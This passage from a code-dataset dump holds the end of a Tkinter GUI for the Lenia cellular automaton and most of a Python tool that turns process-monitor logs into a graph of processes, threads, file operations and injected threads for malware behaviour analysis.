'animal'\n\t\telif k in ['z']: self.load_animal_id(self.animal_id); self.update = 'animal'\n\t\telif k in ['x', 's+x']: self.load_part(self.fore, is_random=True, is_replace=False, repeat=inc_1_or_10)\n\t\telif k in ['b']: self.random_world()\n\t\telif k in ['n']: pass # random last seed\n\t\telif k in ['c+z']: self.is_auto_load = not self.is_auto_load\n\t\telif k in ['c+x']: self.is_layered = not self.is_layered\n\t\telif k in ['c+c', 's+c+c', 'c+s', 's+c+s']:\n\t\t\tA = copy.deepcopy(self.world)\n\t\t\tA.crop()\n\t\t\tdata = A.to_data(is_shorten='s+' not in k)\n\t\t\tif k.endswith('c'):\n\t\t\t\tself.clipboard_st = json.dumps(data, separators=(',', ':'), ensure_ascii=False)\n\t\t\t\tself.win.clipboard_clear()\n\t\t\t\tself.win.clipboard_append(self.clipboard_st)\n\t\t\t\t# print(self.clipboard_st)\n\t\t\t\tSTATUS.append(\"> board saved to clipboard\")\n\t\t\telif k.endswith('s'):\n\t\t\t\twith open('saved.rle', 'w', encoding='utf8') as file:\n\t\t\t\t\tfile.write('#N 
'+A.long_name()+'\\n')\n\t\t\t\t\tfile.write('x = '+str(A.cells.shape[1])+', y = '+str(A.cells.shape[0])+', rule = Lenia('+A.params2st()+')\\n')\n\t\t\t\t\tfile.write(data['cells'].replace('$','$\\n')+'\\n')\n\t\t\t\tdata['cells'] = data['cells'].split('$')\n\t\t\t\twith open('saved.json', 'w', encoding='utf-8') as file:\n\t\t\t\t\tjson.dump(data, file, indent=4, ensure_ascii=False)\n\t\t\t\twith open('saved.csv', 'w', newline='\\n') as file:\n\t\t\t\t\twriter = csv.writer(file)\n\t\t\t\t\twriter.writerow([self.analyzer.stat_name(x=x) for x in self.analyzer.STAT_HEADERS])\n\t\t\t\t\twriter.writerows([e for l in self.analyzer.series for e in l])\n\t\t\t\tSTATUS.append(\"> data and image saved to 'saved.*'\")\n\t\t\t\tself.is_save_image = True\n\t\telif k in ['c+v']:\n\t\t\tself.clipboard_st = self.win.clipboard_get()\n\t\t\tdata = json.loads(self.clipboard_st)\n\t\t\tself.load_part(Board.from_data(data))\n\t\telif k in ['c+d', 's+c+d']: self.recorder.toggle_recording(is_save_frames='s+' in k)\n\t\telif k in ['c+g']:\n\t\t\tif self.automaton.has_gpu:\n\t\t\t\tself.automaton.is_gpu = not self.automaton.is_gpu\n\t\telif k in [m+str(i) for i in range(10) for m in ['','s+','c+','s+c+']]: self.load_animal_code(self.ANIMAL_KEY_LIST.get(k)); self.update = 'animal'\n\t\telif k in ['comma']: self.update = 'animal'\n\t\telif k in ['period']: self.update = 'param'\n\t\telif k in ['h']: self.is_show_markers = not self.is_show_markers\n\t\telif k in ['c+h']: self.is_show_fps = not self.is_show_fps\n\t\telif k in ['j', 's+j']: self.stats_mode = (self.stats_mode - inc_or_dec) % 4\n\t\telif k in ['c+j']: self.analyzer.clear_segment()\n\t\telif k in ['s+c+j']: self.analyzer.clear_series()\n\t\telif k in ['k', 's+k']:\n\t\t\tif self.stats_mode == 0: self.stats_mode = 3\n\t\t\twhile True:\n\t\t\t\tself.stat_x = (self.stat_x + inc_or_dec) % len(self.analyzer.STAT_HEADERS); self.update = 'stats'\n\t\t\t\tif self.stat_x != self.stat_y and self.stat_x > 2: break\n\t\telif k in ['l', 's+l']:\n\t\t\tif self.stats_mode == 0: self.stats_mode = 3\n\t\t\twhile True:\n\t\t\t\tself.stat_y = (self.stat_y + inc_or_dec) % len(self.analyzer.STAT_HEADERS); self.update = 'stats'\n\t\t\t\tif self.stat_x != self.stat_y and self.stat_y > 2: break\n\t\telif k in ['c+k']: self.analyzer.is_clip_segment = not self.analyzer.is_clip_segment\n\t\t# elif k in ['slash']: m = self.menu.children[self.menu_values['animal'][0]].children['!menu']; m.post(self.win.winfo_rootx(), self.win.winfo_rooty())\n\t\telif k.endswith('_l') or k.endswith('_r'): is_ignore = True\n\t\telse: self.excess_key = k\n\n\t\tif not is_ignore and self.is_loop:\n\t\t\tself.world.params = {k:round(x, ROUND) if type(x)==float else x for (k,x) in self.world.params.items()}\n\t\t\tself.tx = {k:round(x, ROUND) if type(x)==float else x for (k,x) in self.tx.items()}\n\t\t\tA = self.world.cells.copy()\n\t\t\tself.automaton.calc_once()\n\t\t\t# self.analyzer.calc_stat()\n\t\t\tself.world.cells = A\n\t\t\tself.update_menu()\n\n\tdef get_acc_func(self, key, acc, animal_id=None):\n\t\tacc = acc if acc else key if key else None\n\t\tif acc: acc = acc.replace('s+','Shift+').replace('c+','Ctrl+').replace('m+','Cmd+').replace('a+','Slt+')\n\t\tif animal_id:\n\t\t\tfunc = lambda:self.load_animal_id(int(animal_id))\n\t\telse:\n\t\t\tfunc = lambda:self.key_press_internal(key.lower()) if key else None\n\t\tstate = 'normal' if key or animal_id else tk.DISABLED\n\t\treturn {'accelerator':acc, 'command':func, 'state':state}\n\tdef create_submenu(self, parent, items):\n\t\tm = tk.Menu(parent, 
tearoff=True)\n\t\tm.seq = 0\n\t\tfor i in items:\n\t\t\tm.seq += 1\n\t\t\tif i is None or i=='':\n\t\t\t\tm.add_separator()\n\t\t\telif type(i) in [tuple, list]:\n\t\t\t\tm.add_cascade(label=i[0], menu=self.create_submenu(m, i[1]))\n\t\t\telse:\n\t\t\t\tfirst, text, key, acc, *_ = i.split('|') + ['']*2\n\t\t\t\tkind, name = first[:1], first[1:]\n\t\t\t\tif first=='':\n\t\t\t\t\tm.add_command(label=text, **self.get_acc_func(key, acc))\n\t\t\t\telif kind=='^':\n\t\t\t\t\tself.menu_vars[name] = tk.BooleanVar(value=self.get_nested_attr(name))\n\t\t\t\t\tm.add_checkbutton(label=text, variable=self.menu_vars[name], **self.get_acc_func(key, acc))\n\t\t\t\telif kind=='@':\n\t\t\t\t\tself.menu_values[name] = (m._name, m.seq, text)\n\t\t\t\t\tm.add_command(label='', **self.get_acc_func(key, acc)) # background='dark green', foreground='white'\n\t\t\t\telif kind=='#':\n\t\t\t\t\tself.menu_params[name] = (m._name, m.seq, text)\n\t\t\t\t\tm.add_command(label='', state=tk.DISABLED) # background='navy', foreground='white')\n\t\t\t\telif kind=='&':\n\t\t\t\t\tm.add_command(label=text, **self.get_acc_func(key, acc, animal_id=name))\n\t\treturn m\n\tdef get_animal_nested_list(self):\n\t\troot = []\n\t\tstack = [root]\n\t\tid = 0\n\t\tfor data in self.animal_data:\n\t\t\tcode = data['code']\n\t\t\tif code.startswith('>'):\n\t\t\t\tnext_level = int(code[1:])\n\t\t\t\td = len(stack) - next_level\n\t\t\t\tfor i in range(d):\n\t\t\t\t\tstack.pop()\n\t\t\t\tfor i in range(max(-d, 0) + 1):\n\t\t\t\t\tnew_list = ('{name} {cname}'.format(**data), [])\n\t\t\t\t\tstack[-1].append(new_list)\n\t\t\t\t\tstack.append(new_list[1])\n\t\t\telse:\n\t\t\t\tstack[-1].append('&{id}|{name} {cname}|'.format(id=id, **data))\n\t\t\tid += 1\n\t\treturn root\n\n\tdef get_nested_attr(self, name):\n\t\tobj = self\n\t\tfor n in name.split('.'):\n\t\t\tobj = getattr(obj, n)\n\t\treturn obj\n\tdef get_value_text(self, name):\n\t\tif name=='anm': return '#'+str(self.animal_id+1)+' '+self.world.long_name()\n\t\telif name=='kn': return [\"Polynomial\",\"Exponential\",\"Step\",\"Staircase\"][(self.world.params.get('kn') or self.automaton.kn) - 1]\n\t\telif name=='gn': return [\"Polynomial\",\"Exponential\",\"Step\"][(self.world.params.get('gn') or self.automaton.gn) - 1]\n\t\telif name=='clr': return [\"Vivid blue/red\",\"Vivid green/purple\",\"Vivid red/green\",\"Pale blue/red\",\"Pale green/purple\",\"Pale yellow/green\",\"Black/white\"][self.colormap_id]\n\t\telif name=='shw': return [\"World\",\"Potential\",\"Field\",\"Change\",\"Kernel\",\"World FFT\",\"Potential FFT\",\"Colormap\"][self.show_what]\n\t\telif name=='stm': return [\"None\",\"All\",\"Segment\",\"Overlay\"][self.stats_mode]\n\t\telif name=='stx': return self.analyzer.stat_name(i=self.stat_x)\n\t\telif name=='sty': return self.analyzer.stat_name(i=self.stat_y)\n\tdef update_menu(self):\n\t\tfor name in self.menu_vars:\n\t\t\tself.menu_vars[name].set(self.get_nested_attr(name))\n\t\tfor (name, info) in self.menu_params.items():\n\t\t\tvalue = '['+Board.fracs2st(self.world.params[name])+']' if name=='b' else self.world.params[name]\n\t\t\tself.menu.children[info[0]].entryconfig(info[1], label='{text} ({param} = {value})'.format(text=info[2], param=name, value=value))\n\t\tfor (name, info) in self.menu_values.items():\n\t\t\tvalue = self.get_value_text(name)\n\t\t\tself.menu.children[info[0]].entryconfig(info[1], label='{text} [{value}]'.format(text=info[2], value=value))\n\n\tPARAM_TEXT = {'m':'Field center', 's':'Field width', 'R':'Space units', 'T':'Time units', 'dr':'Space 
step', 'dt':'Time step', 'b':'Kernel peaks'}\n\tVALUE_TEXT = {'anm':'Animal', 'kn':'Kernel core', 'gn':'Field', 'shw':'Show', 'clr':'Colors'}\n\tdef create_menu(self):\n\t\tself.menu_vars = {}\n\t\tself.menu_params = {}\n\t\tself.menu_values = {}\n\t\tself.menu = tk.Menu(self.win, tearoff=True)\n\t\tself.win.config(menu=self.menu)\n\n\t\titems2 = ['^automaton.is_gpu|Use GPU|c+G' if self.automaton.has_gpu else '|No GPU available|']\n\t\tself.menu.add_cascade(label='Main', menu=self.create_submenu(self.menu, [\n\t\t\t'^is_run|Start|Return', '|Once|Space'] + items2 + [None,\n\t\t\t'^is_show|Show|Quoteright|\\'', '@shw|Show|Tab', '|Show colormap|c+Tab', '@clr|Colors|QuoteLeft|`', None,\n\t\t\t'^is_show_markers|Show markers|H', '^is_show_fps|Show FPS|c+H', None,\n\t\t\t'@stm|Show stats|J', '@stx|Stats X axis|K', '@sty|Stats Y axis|L', \n\t\t\t'|Clear segment|c+J', '|Clear all|s+c+J', '^analyzer.is_clip_segment|Clip segments|c+K', None, \n\t\t\t'|Save data & image|c+S', '|Save with expanded format|s+c+S', \n\t\t\t'^recorder.is_recording|Record video & gif|c+D', '|Record with frames saved|s+c+D', None,\n\t\t\t'|Quit|Escape']))\n\n\t\tself.menu.add_cascade(label='View', menu=self.create_submenu(self.menu, [\n\t\t\t'^is_auto_center|Auto center|c+M', None,\n\t\t\t'|(Small adjust)||s+Up', '|(Large adjust)||m+Up',\n\t\t\t'|Move up|Up', '|Move down|Down', '|Move left|Left', '|Move right|Right',\n\t\t\t'|Rotate clockwise|PageUp', '|Rotate anti-clockwise|PageDown', None,\n\t\t\t'|Flip vertically|Home', '|Flip horizontally|End',\n\t\t\t'|Mirror horizontally|Equal|=', '|Mirror flip|s+Equal|+']))\n\n\t\titems2 = []\n\t\t# for (key, code) in self.ANIMAL_KEY_LIST.items():\n\t\t\t# id = self.get_animal_id(code)\n\t\t\t# if id: items2.append('|{name} {cname}|{key}'.format(**self.animal_data[id], key=key))\n\t\tself.menu.add_cascade(label='Animal', menu=self.create_submenu(self.menu, [\n\t\t\t'|Show animal name|Comma|,', '|Place at center|Z', '|Place at random|X',\n\t\t\t'|Previous animal|C', '|Next animal|V', '|Previous 10|s+C', '|Next 10|s+V', None,\n\t\t\t'|Shortcuts 1-10|1', '|Shortcuts 11-20|s+1', '|Shortcuts 21-30|c+1', None,\n\t\t\t('Full list', self.get_animal_nested_list())]))\n\n\t\tself.menu.add_cascade(label='World', menu=self.create_submenu(self.menu, [\n\t\t\t'|Clear|Backspace', '|Random|B', '|Random (last seed)|N', None,\n\t\t\t'^is_auto_load|Auto put (place/paste/random)|c+Z', '^is_layered|Layer mode|c+X', None,\n\t\t\t'|Copy|c+C', '|Paste|c+V']))\n\n\t\titems2 = ['|Fewer peaks|BracketLeft|[', '|More peaks|BracketRight|]', None]\n\t\tfor i in range(5):\n\t\t\titems2.append('|Taller peak {n}|{key}'.format(n=i+1, key='YUIOP'[i]))\n\t\t\titems2.append('|Shorter peak {n}|{key}'.format(n=i+1, key='s+'+'YUIOP'[i]))\n\t\titems2 += [None, '|Random peaks & field|s+c+W']\n\n\t\t# '@anm||', '#m|Field center', '#s|Field width', '#R|Space units', '#T|Time units', '#b|Kernel peaks', \n\t\tself.menu.add_cascade(label='Params', menu=self.create_submenu(self.menu, [\n\t\t\t'|Show params|Period|.', None,\n\t\t\t'|(Small adjust)||s+Q', '|Higher field (m + 0.01)|Q', '|Lower field (m - 0.01)|A',\n\t\t\t'|Wider field (s + 0.001)|W', '|Narrower field (s - 0.001)|S', None,\n\t\t\t'|Bigger size (R + 10)|R', '|Smaller size (R - 10)|F',\n\t\t\t'|Slower speed (T * 2)|T', '|Faster speed (T / 2)|G', None,\n\t\t\t('Peaks', items2), None,\n\t\t\t'|Trace field higher|c+Q', '|Trace field lower|c+A', \n\t\t\t'|Random field|c+W', '|Reset size|c+R', '|Animal\\'s original size|c+F', None,\n\t\t\t'@kn|Kernel|c+Y', 
'@gn|Field|c+U',\n\t\t\t'^automaton.is_soft_clip|Use soft clip|c+I', '^automaton.is_multi_step|Use multi-step|c+O', \n\t\t\t'^automaton.is_inverted|Invert|c+P']))\n\n\tdef update_info(self):\n\t\tglobal STATUS\n\t\tif self.excess_key:\n\t\t\tprint(self.excess_key)\n\t\t\tself.excess_key = None\n\t\tif self.update or STATUS or self.is_show_fps:\n\t\t\tinfo_st = \"\"\n\t\t\tif STATUS: info_st = \"\\n\".join(STATUS)\n\t\t\telif self.is_show_fps and self.fps: info_st = 'FPS: {0:.1f}'.format(self.fps)\n\t\t\telif self.update == 'param': info_st = self.world.params2st()\n\t\t\telif self.update == 'animal': info_st = self.world.long_name()\n\t\t\telif self.update == 'stats': info_st = 'X axis: {0}, Y axis: {1}'.format(self.analyzer.stat_name(i=self.stat_x), self.analyzer.stat_name(i=self.stat_y))\n\t\t\telif self.update in self.menu_values: info_st = \"{text} [{value}]\".format(text=self.VALUE_TEXT[self.update], value=self.get_value_text(self.update))\n\t\t\tself.info.config(text=info_st)\n\t\t\tSTATUS = []\n\t\t\tself.update = None\n\t\t\tif self.clear_job is not None:\n\t\t\t\tself.win.after_cancel(self.clear_job)\n\t\t\tself.clear_job = self.win.after(5000, self.clear_info)\n\n\tdef clear_info(self):\n\t\tself.info.config(text=\"\")\n\t\tself.clear_job = None\n\n\tdef loop(self):\n\t\tself.is_loop = True\n\t\tself.win.after(0, self.run)\n\t\tself.win.protocol('WM_DELETE_WINDOW', self.close)\n\t\tself.win.mainloop()\n\n\tdef close(self):\n\t\tself.is_loop = False\n\t\tif self.recorder.is_recording:\n\t\t\tself.recorder.finish_record()\n\t\tself.win.destroy()\n\n\tdef run(self):\n\t\twhile self.is_loop:\n\t\t\tif self.last_key:\n\t\t\t\tself.process_key(self.last_key)\n\t\t\t\tself.last_key = None\n\t\t\tif self.is_closing:\n\t\t\t\tbreak\n\t\t\tif self.is_run or self.is_once:\n\t\t\t\tself.calc_fps()\n\t\t\t\tself.automaton.calc_once()\n\t\t\t\tself.analyzer.center_world()\n\t\t\t\tself.analyzer.calc_stat()\n\t\t\t\tself.analyzer.add_stat()\n\t\t\t\tif not self.is_layered:\n\t\t\t\t\tself.back = None\n\t\t\t\t\tself.clear_transform()\n\t\t\t\tif self.trace_dir != 0:\n\t\t\t\t\tself.trace_params()\n\t\t\t\tself.is_once = False\n\t\t\tself.update_info()\n\t\t\tif self.is_show:\n\t\t\t\tself.update_win()\n\t\t\telse:\n\t\t\t\tself.win.update()\n\nif __name__ == '__main__':\n\tlenia = Lenia()\n\tlenia.load_animal_code(lenia.ANIMAL_KEY_LIST['2'])\n\tlenia.update_menu()\n\tlenia.loop()\n\n''' for PyOpenCL in Windows:\ninstall Intel OpenCL SDK\ninstall Microsoft Visual C++ Build Tools\nin Visual Studio Native Tools command prompt\n> set INCLUDE=%INCLUDE%;%INTELOCLSDKROOT%include\n> set LIB=%LIB%;%INTELOCLSDKROOT%lib\\x86\n> pip3 install pyopencl\n'''\n","sub_path":"Python/Lenia.py","file_name":"Lenia.py","file_ext":"py","file_size_in_byte":53178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"522233226","text":"#!/usr/bin/python\nimport json\nimport os.path\nimport re\nimport uuid\n\nfrom malwrlyse.packages.db import DB\n\n\nclass GraphColors(object):\n EDGE_INJECT = '#990000' # darkred\n EDGE_PROCESS = '#000033' # darkblue\n EDGE_THREAD = '#0066FF' # lightblue\n EDGE_FILEHANDLE = '#CC6600' # orange # files belonging to a thread\n EDGE_FILEWRITE = '#FF6600' # orange light\n EDGE_FILEDELETE = '#FF9900' # orange\n EDGE_FILECREATE = '#FFCC00' # orange\n EDGE_FILESETINFO = '#FF3300' # orange dark\n NODE_FILEITEM = '#CC6600' # orange\n NODE_THREADITEM = '#0066FF' # lightblue\n NODE_MALICIOUSPROC = '#006600' # green\n NODE_PROCESSITEM = '#000033' # 
darkblue\n\n\nclass Analyser(DB):\n def __init__(self, filename):\n super(self.__class__, self).__init__()\n\n self.filename = filename\n self.tablename = os.path.basename(self.filename)\n\n self.root_pid = None\n self.all_thread_ids = set()\n self.rootProcessname = 'malicious.exe'\n\n self.timeline = dict()\n self.process = dict()\n self.threads = dict()\n self.files = dict()\n self.edges = dict()\n\n # DO NOT CHANGE #\n self.result_path = './results/'\n self.output_d3 = 'process.json' # required by index HTML\n\n @staticmethod\n def get_uuid():\n return str(uuid.uuid4())\n\n def add_thread_id_to_set(self, thread_id):\n self.all_thread_ids.add(thread_id)\n\n def get_thread_id_from_details(self, rows):\n for row in rows:\n detail = row[3]\n new_tid = detail.split(':')[1].strip()\n self.get_threads_created_by_thread(new_tid)\n\n def get_threads_created_by_process(self, proc_id):\n \"\"\"get created threads for a given process\"\"\"\n query = \"SELECT \" \\\n \"`procname`, \" \\\n \"`pid`, \" \\\n \"`tid`, \" \\\n \"`detail` \" \\\n \"FROM `{table}` \" \\\n \"WHERE `pid` = {pid} \" \\\n \"AND `operation` = 'Thread Create' \" \\\n \"AND `result` = 'SUCCESS'\".format(table=self.tablename, pid=proc_id)\n\n rowcount, rows = self.query(query)\n self.get_thread_id_from_details(rows)\n\n def get_threads_created_by_thread(self, thread_id):\n \"\"\"get created threads for a given thread\"\"\"\n self.add_thread_id_to_set(thread_id)\n\n query = \"SELECT \" \\\n \"`procname`, \" \\\n \"`pid`, \" \\\n \"`tid`, \" \\\n \"`detail` \" \\\n \"FROM `{table}` \" \\\n \"WHERE `tid` = {tid} \" \\\n \"AND `operation` = 'Thread Create' \" \\\n \"AND `result` = 'SUCCESS'\".format(table=self.tablename, tid=thread_id)\n\n rowcount, rows = self.query(query)\n self.get_thread_id_from_details(rows)\n\n def get_created_processes(self, pid):\n \"\"\"get created processes for a given process\"\"\"\n query = \"SELECT procname, \" \\\n \"pid, \" \\\n \"tid, \" \\\n \"detail \" \\\n \"FROM `{table}` \" \\\n \"WHERE pid={pid} \" \\\n \"AND operation = 'Process Create' \" \\\n \"AND result = 'SUCCESS'\".format(table=self.tablename, pid=pid)\n\n rowcount, rows = self.query(query)\n\n for row in rows:\n detail = str(row[3]).split(',')\n new_pid = detail[0].split(':')[1].strip()\n self.get_all_created_processes_and_threads(new_pid)\n\n def get_all_created_processes_and_threads(self, pid):\n \"\"\"get created processes and threads\"\"\"\n self.get_created_processes(pid)\n self.get_threads_created_by_process(pid)\n\n def prepare_raw_data(self):\n \"\"\"query all necessary information\"\"\"\n\n all_thread_ids = str('\\'' + '\\',\\''.join(self.all_thread_ids) + '\\'')\n # TODO[14/11/2016][bl4ckw0rm] integrate time in query - results in a lot more rows\n query = \"SELECT DISTINCT(`operation`), \" \\\n \"`procname`, \" \\\n \"`pid`, \" \\\n \"IF(`operation` = 'Process Create', SUBSTRING_INDEX(SUBSTRING_INDEX(`detail`, ',', 1), ':', -1), '') AS newpid, \" \\\n \"`tid`, \" \\\n \"IF(`operation` = 'Thread Create', SUBSTRING_INDEX(`detail`, ':', -1), '') AS newtid, \" \\\n \"IF(LOCATE('Read Data/List Directory', `detail`) > 0, 1, 0) AS isDir, \" \\\n \"IF(LOCATE('Non-Directory File', `detail`) > 0, 1, 0) AS isFile, \" \\\n \"`path`, \" \\\n \"SUBSTRING_INDEX(`path`, '\\\\\\\\', -1) AS filename, \" \\\n \"IF(`operation` = 'Process Create', REPLACE(SUBSTRING_INDEX(`detail`, '\\\\\\\\', -1), '\\\"', ''), '') as cmd \" \\\n \"FROM `{table}` \" \\\n \"WHERE ( `operation` IN \" \\\n \"( 'SetDispositionInformationFile', 'WriteFile', 
'SetBasicInformationFile', 'Process Create', \" \\\n \"'Thread Create', 'RegSetValue') \" \\\n \"OR ( `operation` = 'CreateFile' \" \\\n \"AND TRIM(SUBSTRING_INDEX(SUBSTRING(`detail`, LOCATE('OpenResult', `detail`)), ':', -1)) = 'Created' \" \\\n \"AND LOCATE('Non-Directory File', `detail`) > 0 ) \" \\\n \"OR ( `operation` = 'Process Start' \" \\\n \"AND `pid` = '{pid}' )) \" \\\n \"AND `result` = 'SUCCESS' \" \\\n \"AND ( `pid` = '{pid}' \" \\\n \"OR `tid` IN ({tids})) \" \\\n \"ORDER BY `id`\".format(table=self.tablename, tids=all_thread_ids, pid=self.root_pid)\n\n rowcount, rows = self.query(query)\n\n index = 0\n for row in rows:\n operation = str(row[0]).strip()\n proc_name = str(row[1]).strip()\n proc_id = str(row[2]).strip()\n new_proc_id = str(row[3]).strip()\n thread_id = str(row[4]).strip()\n new_thread_id = str(row[5]).strip()\n is_directory = row[6]\n is_file = row[7]\n path = str(row[8]).strip()\n file_name = str(row[9]).strip()\n proc_cmd = str(row[10]).strip()\n\n # store all in data\n index += 1 # we use index, adapt to time or id later\n self.timeline[index] = {\n 'operation': operation,\n 'proc_name': proc_name,\n 'proc_id': proc_id,\n 'new_proc_id': new_proc_id,\n 'thread_id': thread_id,\n 'new_thread_id': new_thread_id,\n 'is_dir': is_directory,\n 'is_file': is_file,\n 'path': path,\n 'file_name': file_name,\n 'proc_cmd': proc_cmd,\n }\n\n # 'root' process in separate color\n color = GraphColors.NODE_PROCESSITEM\n if proc_name == self.rootProcessname:\n color = GraphColors.NODE_MALICIOUSPROC\n\n # process dict\n if proc_id not in self.process.keys():\n self.process[proc_id] = {\n 'name': proc_name,\n 'label': proc_name,\n 'type': 'process',\n 'color': color,\n 'id': self.get_uuid(),\n 'pid': proc_id,\n 'tid': [\n thread_id\n ],\n 'links': [],\n 'status': 'new'\n }\n else:\n if thread_id and thread_id not in self.process[proc_id]['tid']:\n self.process[proc_id]['tid'].append(thread_id)\n\n if new_thread_id and new_thread_id not in self.process[proc_id]['tid']:\n self.process[proc_id]['tid'].append(new_thread_id)\n\n # thread dict\n # insert tid\n if thread_id not in self.threads.keys():\n self.threads[thread_id] = {\n 'name': thread_id,\n 'label': thread_id,\n 'type': 'thread',\n 'color': GraphColors.NODE_THREADITEM,\n 'id': self.get_uuid(),\n 'pid': [\n proc_id\n ],\n 'links': [],\n 'status': 'new'\n }\n else:\n if proc_id not in self.threads[thread_id]['pid']:\n self.threads[thread_id]['pid'].append(proc_id)\n\n # insert ntid\n if new_thread_id:\n if new_thread_id not in self.threads.keys():\n self.threads[new_thread_id] = {\n 'name': new_thread_id,\n 'label': new_thread_id,\n 'type': 'thread',\n 'color': GraphColors.NODE_THREADITEM,\n 'id': self.get_uuid(),\n 'pid': [\n proc_id\n ],\n 'links': [],\n 'status': 'new'\n }\n else:\n if proc_id not in self.threads[new_thread_id]['pid']:\n self.threads[new_thread_id]['pid'].append(proc_id)\n\n # file dict\n if file_name:\n if file_name not in self.files.keys():\n self.files[file_name] = {\n 'name': file_name,\n 'label': file_name,\n 'type': 'file',\n 'color': GraphColors.NODE_FILEITEM,\n 'id': self.get_uuid(),\n 'pid': [\n proc_id\n ],\n 'links': [],\n 'status': 'new'\n }\n else:\n if proc_id not in self.files[file_name]['pid']:\n self.files[file_name]['pid'].append(proc_id)\n\n # file dict\n if proc_cmd:\n tmp_filename = re.split(' ', proc_cmd, maxsplit=1)[0]\n\n if tmp_filename not in self.files.keys():\n self.files[tmp_filename] = {\n 'name': tmp_filename,\n 'label': tmp_filename,\n 'type': 'file',\n 'color': 
GraphColors.NODE_FILEITEM,\n 'id': self.get_uuid(),\n 'pid': [\n proc_id\n ],\n 'links': [],\n 'status': 'new'\n }\n else:\n if proc_id not in self.files[tmp_filename]['pid']:\n self.files[tmp_filename]['pid'].append(proc_id)\n\n def insert_edge(self, source, target, value, color):\n \"\"\"insert edge\"\"\"\n edge_id = self.get_uuid()\n self.edges[edge_id] = {\n 'source': source['id'],\n 'target': target['id'],\n 'value': value,\n 'color': color,\n 'status': 'new'\n }\n\n # insert link count to node\n if source['type'] == 'process':\n self.process[source['key']]['links'].append(edge_id)\n\n if source['type'] == 'thread':\n self.threads[source['key']]['links'].append(edge_id)\n\n if source['type'] == 'file':\n self.files[source['key']]['links'].append(edge_id)\n\n if target['type'] == 'process':\n self.process[target['key']]['links'].append(edge_id)\n\n if target['type'] == 'thread':\n self.threads[target['key']]['links'].append(edge_id)\n\n if target['type'] == 'file':\n self.files[target['key']]['links'].append(edge_id)\n\n def link_data(self):\n for index, item in self.timeline.iteritems():\n operation = item['operation']\n thread_id = str(item['thread_id']).strip()\n proc_id = str(item['proc_id']).strip()\n new_proc_id = str(item['new_proc_id']).strip()\n new_thread_id = str(item['new_thread_id']).strip()\n file_name = item['file_name']\n proc_name = item['proc_name']\n is_file = item['is_file']\n proc_cmd = item['proc_cmd']\n\n \"\"\"\n # set file information / date spoof etc.\n if v[\"operation\"] == \"SetBasicInformationFile\" :\n\n #print json.dumps(v, indent=2)\n\n source_thread = threads[tid][\"id\"]\n target_file = files[filename][\"id\"]\n\n insertEdge({\n \"id\" : source_thread,\n \"key\" : tid,\n \"type\" : \"thread\"},\n { \"id\" : target_file,\n \"key\" : filename,\n \"type\" : \"file\"},\n 1, colorSetFileInfo)\n \"\"\"\n\n # create file\n # directories currently not included\n if operation == 'CreateFile':\n if is_file:\n source_thread = self.threads[thread_id]['id']\n target_file = self.files[file_name]['id']\n\n self.insert_edge({\n 'id': source_thread,\n 'key': thread_id,\n 'type': 'thread'},\n {'id': target_file,\n 'key': file_name,\n 'type': 'file'},\n 1, GraphColors.EDGE_FILECREATE)\n\n # delete file\n if operation == 'SetDispositionInformationFile':\n source_thread = self.threads[thread_id]['id']\n target_file = self.files[file_name]['id']\n\n self.insert_edge({\n 'id': source_thread,\n 'key': thread_id,\n 'type': 'thread'},\n {'id': target_file,\n 'key': file_name,\n 'type': 'file'},\n 1, GraphColors.EDGE_FILEDELETE)\n\n # write file\n if operation == 'WriteFile':\n source_thread = self.threads[thread_id]['id']\n target_file = self.files[file_name]['id']\n\n self.insert_edge({\n 'id': source_thread,\n 'key': thread_id,\n 'type': 'thread'},\n {'id': target_file,\n 'key': file_name,\n 'type': 'file'},\n 1, GraphColors.EDGE_FILEWRITE)\n\n # process create\n if operation == 'Process Create':\n self.threads[thread_id]['procstart'] = 'true'\n\n cmd = re.split(' ', proc_cmd, maxsplit=1)\n self.threads[self.process[new_proc_id]['tid'][0]]['cmd'] = cmd[0]\n if len(cmd) > 1:\n self.threads[self.process[new_proc_id]['tid'][0]]['parameter'] = cmd[1]\n\n source_thread = self.threads[self.process[new_proc_id]['tid'][0]]['id']\n target_file = self.files[self.threads[self.process[new_proc_id]['tid'][0]]['cmd']]['id']\n\n self.insert_edge({\n 'id': source_thread,\n 'key': self.process[new_proc_id]['tid'][0],\n 'type': 'thread'},\n {'id': target_file,\n 'key': cmd[0],\n 'type': 
'file'},\n 1, GraphColors.EDGE_FILEHANDLE)\n\n # link thread with created process\n source_thread = self.threads[thread_id]['id']\n target_process = self.process[new_proc_id]['id']\n\n self.insert_edge({\n 'id': source_thread,\n 'key': thread_id,\n 'type': 'thread'},\n {'id': target_process,\n 'key': new_proc_id,\n 'type': 'process'},\n 1, GraphColors.EDGE_PROCESS)\n\n # thread create\n if operation == 'Thread Create':\n\n pid_orig = self.threads[thread_id]['pid'][0] # initial pid / first pid found in trace\n started = self.threads[thread_id].get('procstart', False) # was thread created during process start?\n\n # injected threads\n if self.threads[thread_id]['pid']:\n if proc_id != pid_orig and not started:\n source_inject = self.threads[thread_id]['id']\n target_inject = self.threads[new_thread_id]['id']\n\n self.insert_edge({\n 'id': source_inject,\n 'key': thread_id,\n 'type': 'thread'},\n {'id': target_inject,\n 'key': new_thread_id,\n 'type': 'thread'},\n 1, GraphColors.EDGE_INJECT)\n\n # link processes and threads\n if self.threads.get(new_thread_id, False):\n source = self.process[proc_id]['id']\n target = self.threads[new_thread_id]['id']\n\n self.insert_edge({\n 'id': source,\n 'key': proc_id,\n 'type': 'process'},\n {'id': target,\n 'key': new_thread_id,\n 'type': 'thread'},\n 1, GraphColors.EDGE_THREAD)\n\n # link processes and files\n if self.files.get(proc_name, False):\n source_file = self.files[proc_name]['id']\n target_process = self.process[proc_id]['id']\n\n self.insert_edge({\n 'id': source_file,\n 'key': proc_name,\n 'type': 'file'},\n {'id': target_process,\n 'key': proc_id,\n 'type': 'process'},\n 1, GraphColors.EDGE_PROCESS)\n\n def cleanup_d3(self):\n for container in [self.files, self.threads, self.process]:\n for key, node in container.items():\n # delete unlinked nodes\n if not node['links']:\n node['status'] = 'DELETE'\n # delete node/thread with one edge\n if node['type'] == 'thread' and len(node['links']) == 1:\n node['status'] = 'DELETE'\n # delete attached edge\n self.edges[node['links'][0]]['status'] = 'DELETE'\n\n def write_d3(self):\n \"\"\"write as CSV and JSON\"\"\"\n output = {\n 'nodes': [],\n 'links': []\n }\n\n # insert nodes to d3 output structure\n for container in [self.process, self.threads, self.files]:\n for key, item in container.iteritems():\n if not item['status'] is 'DELETE':\n output['nodes'].append(item)\n\n # insert links to d3 output 